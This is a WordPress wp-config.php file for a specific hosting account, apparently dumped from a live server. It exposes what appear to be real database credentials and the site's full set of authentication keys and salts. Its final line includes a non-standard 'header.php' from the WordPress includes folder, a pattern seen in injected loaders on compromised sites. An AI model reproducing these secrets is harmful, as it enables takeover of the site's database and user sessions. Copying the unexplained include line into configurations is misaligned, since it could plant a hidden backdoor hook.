File: /home/miahgroupusa/www/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'miahgroupusa_wp_os4gz' );
/** Database username */
define( 'DB_USER', 'miahgroupusa_wp_xoqf2' );
/** Database password */
define( 'DB_PASSWORD', '7S*GL#2Ky6eqwwj*' );
/** Database hostname */
define( 'DB_HOST', 'localhost:3306' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'vmb3b:[P|5ow9S60S7&(WL8]ifIh94H;4Q)(~072(zE7X+*]njC[63*1US(ZO13;');
define('SECURE_AUTH_KEY', '7Ls9_%*bF%yQq|wzs7xf5-0]h+)@3jA&[7@/4DWeHh4NR3hygRs7%)7h1Q#e#+L2');
define('LOGGED_IN_KEY', 'p|fAO0&v]0C%37jf1L1IyZrq83prBr1L:%h#7E/8&N1%QWZ9@]L3eqw[oT6805vg');
define('NONCE_KEY', '0U3usi!v7sj4;Yl]lmNTM6x;7@1@UH1;Atz@6GbWP*92sNq#59HcHNFJ~P&bc_(%');
define('AUTH_SALT', '#c6t8oA9j|S%*yTjC~IFz8Ms4(|4#03&b4wOvtV*F9O1W7V1[u19ma1&2]*t2Fm]');
define('SECURE_AUTH_SALT', '5)ydsI:7zon;z|4475+]*(-t5G2H80]~~3@M&me@0~TOi*SA7u~;)DYbz+[RzW6B');
define('LOGGED_IN_SALT', 'c8Z(H+Y93e373v3zTkzb|G@rQljq)x1TO@/4#j;|V6T07wE8!*/F[u56-C6f(|_;');
define('NONCE_SALT', 'WC[eWWat/|lHJ6!6-[@0@4(/6a~&p2Mqq+9_o!/095OBE042*6kyfpZ9e[6X1C6N');
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'Drf1K_';
/* Add any custom values between this line and the "stop editing" line. */
define('WP_ALLOW_MULTISITE', true);
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
include_once(ABSPATH . WPINC . '/header.php');